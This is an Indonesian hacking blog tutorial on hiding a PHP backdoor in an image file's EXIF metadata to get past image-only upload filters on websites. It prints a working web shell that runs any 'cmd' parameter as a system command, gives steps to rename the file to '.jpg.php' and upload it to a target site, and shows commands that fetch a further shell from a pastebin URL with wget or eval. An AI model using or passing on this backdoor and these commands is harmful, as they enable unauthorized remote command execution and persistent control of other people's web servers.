Bagaimana Menyisipkan Backdoor PHP Ke Dalam file Gambar - Om Heker

Friday, August 30, 2019

Bagaimana Menyisipkan Backdoor PHP Ke Dalam file Gambar

Baca Juga

shell backdoor

Halo guys jumpa lagi, kali ini om heker akan membagikan tutorial  akan di tutorial kali ini saya akan memberi tutorial Bagaimana Menyisipkan Backdoor PHP Ke Dalam file Gambar, seperti kalian tahu backdoor adalah jalan pintas dalam keamanan sistem yang digunakan oleh para hacker untuk akses masuk ke dalam suatu system.

Mungkin beberapa dari kalian yang pernah masuk kedalam sistem dashboard suatu website akan tetapi pada saat sedang mengupload shell tidak bisa dikarenakan file yang diperbolehkan adalah image only dan biar ditamper pun tidak akan bisa. Berikut tutorial membypass nya dengan menyisipkan backdoor PHP ke dalam gambar.

Bahan - Bahan yang diperlukan (Windows ):

  1. Exif Editor ( Download Disini )
  2. Gambar yang akan  di sisipkan

Code Backdoor PHP :

<style>body{font-size: 0;}h1{font-size: 12px}</style><h1><?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="LINK GAMBAR" border=0>';}__halt_compiler();?></h1>
Tips! : LINK GAMBAR isilah dengan url gambar kalian contohnya
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1><?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="https://dummyimage.com/1280x510/000/fff.jpg" border=0>';}__halt_compiler();?></h1>

Step cara caranya :

  • Bukalah Exif Editor
Screenshot001
  •  Kemudia klik Open lalu pilihlah gambar yang ingin disisipkan Backdoor PHP.
Screenshot002
  • Klik gambar plus (+)
Screenshot003
Klik Yes.
Screenshot004
  • Setelah itu Isilah Type sesuai gambar dibawah ini dan juga isilah Value dengan keinginan kalian, lalu klik Add.
Screenshot005
  • Kemduian lakukan klik 1 Pending Change
Screenshot010
  • Setelah itu klik Edit Modification
Screenshot009
  • Lalu Masukan kode PHP yang ada di atas tadi kedalam New Value lalu kemudian klik Save
Screenshot008
  •  Lalu Klik Save 
Screenshot006
Setelah itu Pilih lah tempat penyimpanan gambar yang sudah di inject tadi dan klik save

Screenshot011
  • Ubahlah extensi gambar tadi menjadi 
namagambar.jpg.php
  • Dan cobalah cek menggunakan notepad ++ apakah sudah terinject.
Screenshot014
Dan ternyata sudah terinject/ tersisipkan
  • Kemudian Kalian coba upload ke website target dan ketika sudah berhasil mengupload lalu akses lah gambar tadi dan coba masukan ?cmd= pada belakang nama gambar contohnya target.com/mastahcyber.jpg.php?cmd= lalu masukan perintah berikut uname -a contohnya ?cmd= uname -a dan jika muncul keterangan server target berarti berhasil seperti gambar dibawah ini.
Screenshot015
  •  Selanjutnya cobalah upload shell menggunakan perintah.
echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/en5tp4kX"));?>' > shell.php
Bisa juga
wget https://pastebin.com/raw/en5tp4kX -O shell.php 
Tips! : Yang saya berikan warna biru kamu bisa ubah dengan shell yang kamu inginkan dan yang warna kuning itu untuk nama shell nya dan kamu juga bisa mengubahnya.
  • Cobalah kamu akses shell yang sudah kamu upload tadi sesuai nama shell dan letak dir. contohnya target.com/shell.php
Screenshot016


Dan shell pun terupload dan kita berhasil membypass nya  nah mudah kan.
Sekian dulu tutorial dari om heker, sampai jumpa di tutorial berikutnya dan nantikanlah tutorial menarik lainnya. jangan lupa share ya





Penulusuran terkait:
cara menyisipkan backdoor metasploit ke gambar termux
cara inject php ke gambar
membuat exploit dengan gambar
jhead termux
backdoor image php
menyisipkan file backdoor menggunakan termux
cara membuat backdoor dengan kali linux
exif php shell

Comments


EmoticonEmoticon